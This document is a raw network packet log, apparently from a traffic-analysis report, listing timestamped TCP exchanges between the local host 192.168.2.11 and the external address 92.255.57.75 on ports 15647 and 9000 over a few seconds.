Dec 17, 2024 08:40:23.432291031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.432399035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.432425022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.432499886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.444749117 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.444931030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.447359085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.447438955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.449733973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.449769020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.450002909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.465553999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.465619087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.465636969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.465723991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.467993975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.468213081 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.470103979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.470585108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.484294891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.484502077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.484704018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.496475935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.496598959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.507765055 CET	50053	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.514024973 CET	9000	50052	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.515979052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.515993118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.516067982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.519351959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.519365072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.519428015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.549447060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.549757004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.555807114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.555883884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.555988073 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.557188988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.557205915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.557244062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.571464062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.571909904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.585536003 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.587898016 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.604387045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.607872009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.616751909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.620143890 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.627614021 CET	9000	50053	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.627752066 CET	50053	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.636856079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.636935949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.637396097 CET	50053	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.667574883 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.676054001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.676120043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.676152945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.686990023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.687156916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.705631971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.708257914 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.710176945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.726594925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.740063906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.740221024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.758039951 CET	9000	50053	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.758429050 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.759738922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.761878967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.780951977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.787758112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.787879944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.798841953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.798958063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.808655024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.808737040 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.825599909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.825681925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.844497919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.846395016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.846466064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.860090971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.860213995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.868321896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.868434906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.878571987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.878660917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.895184040 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.900757074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.900855064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.907664061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.911344051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.920062065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.920083046 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.920238018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.945604086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.946260929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.964581013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.966073036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.980104923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.980281115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.993561029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.993699074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.993949890 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.015254974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.019958973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.020665884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.020725012 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.037384033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.038781881 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.039805889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.039817095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.040064096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.056735039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.056751013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.057117939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.081947088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.086121082 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.087871075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.103662014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.107038021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.107208014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.107295036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.109216928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.111859083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.130001068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.139807940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.142762899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.142772913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.142925978 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.146207094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.146218061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.146337032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.157582998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.157701015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.160964966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.163805008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.163857937 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.163865089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.163894892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.167182922 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.184060097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.185679913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.185903072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.201987028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.203855038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.217915058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.217998028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.218110085 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.220319033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.220386982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.220393896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.220432043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.223619938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.223711967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.248241901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.248359919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.248743057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.249308109 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.250374079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.266113043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.266628981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.270919085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.270967007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.270967960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.271070957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.273180008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.273243904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.278096914 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.278266907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.283103943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.283194065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.283293009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.287801027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.292272091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.296016932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.298732042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.305512905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.328747034 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.331363916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.331485987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.331516981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.331588984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.333914995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.334012985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.334415913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.334427118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.334506989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.337836981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.343552113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.382102013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.382147074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.382193089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.390749931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.394628048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.394886971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.403116941 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.440922976 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.448647976 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.455355883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.455549002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.455627918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.459230900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.459306955 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.459338903 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.499747992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.499855042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.499874115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.515993118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.516057968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.523956060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.523986101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.524058104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.539006948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.560370922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.567337990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.567406893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.567472935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.572968960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.573165894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.573246956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.582947969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.583827019 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.604032040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.604276896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.604516029 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.606517076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.624248028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.624346018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.624474049 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.643832922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.647845984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.650895119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.687899113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.688033104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.688119888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.690301895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.690742970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.724659920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.724780083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.724937916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.765517950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.765554905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.765708923 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.796550989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.816574097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.820039988 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.886969090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.916640997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.919828892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.956221104 CET	9000	50053	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.956283092 CET	9000	50053	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:24.956352949 CET	50053	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.956528902 CET	50053	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.957263947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:24.985579014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.039716005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.039845943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.062462091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.064402103 CET	50054	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.076056957 CET	9000	50053	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.077434063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.077622890 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.094376087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.105612040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.107824087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.125017881 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.141787052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.153532028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.154934883 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.171268940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.182590961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.184000015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.184263945 CET	9000	50054	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.184365988 CET	50054	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.185765028 CET	50054	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.197449923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.199337006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.214274883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.214735031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.234697104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.244857073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.247047901 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.261574030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.262271881 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.274832964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.278230906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.291171074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.294035912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.305449963 CET	9000	50054	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.316643953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.319145918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.319204092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.344737053 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.345443010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.354523897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.354588032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.381968975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.382297993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.412117958 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.413696051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.421837091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.421891928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.421902895 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.424545050 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.424623966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.424644947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.436476946 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.436568022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.457700968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.464644909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.464741945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.474514008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.474631071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.495877981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.496114016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.499280930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.499306917 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.499337912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.504739046 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.504782915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.504851103 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.527712107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.531964064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.532064915 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.532782078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.532905102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.532967091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.536218882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.536272049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.536293030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.536331892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.544487000 CET	15647	50034	92.255.57.75	192.168.2.11
